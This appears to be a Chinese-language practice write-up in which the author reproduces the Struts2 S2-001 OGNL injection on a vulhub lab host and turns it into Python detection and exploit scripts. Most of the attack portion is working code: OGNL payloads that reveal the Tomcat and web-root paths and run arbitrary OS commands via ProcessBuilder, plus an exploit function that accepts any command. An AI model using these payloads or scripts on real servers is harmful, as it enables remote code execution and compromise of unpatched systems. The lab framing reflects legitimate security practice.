最近在练写poc和exp,在github上的vulhub找到了struts2全系列漏洞,打算复现来练写poc和exp。
安装好环境如下:
靶机地址:192.168.6.217:8080
该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value}
进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value}
对提交的数据递归执行OGNL 表达式解析,所以直接构造 Payload 进行命令执行
在密码框输入poc验证%{1+33}
在bp中抓包得到
探寻tomcat路径
%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
得到路径获取web路径
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
命令执行
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
接下来利用这些编写相关环境的poc和exp
def s2_001(url):
data = {
'username': '1213',
'password': '%{1+12}'
}
s = requests.post(url=url, data=data, headers=headers)
soup = BeautifulSoup(s.text, 'lxml')
flag = soup.find_all("input")
flag1 = flag[1]
if "13" in str(flag1):
print("存在s2-001漏洞")
else:
pass
效果为
def s2_001exp(url, exec):
data = {
'username': '1212',
'password': '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"' +
exec + '"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}'
}
s = requests.post(url=url, data=data, headers=headers)
soup = BeautifulSoup(s.text, 'lxml')
getexec = soup.find("table")
print(getexec)
exp的效果还没有处理好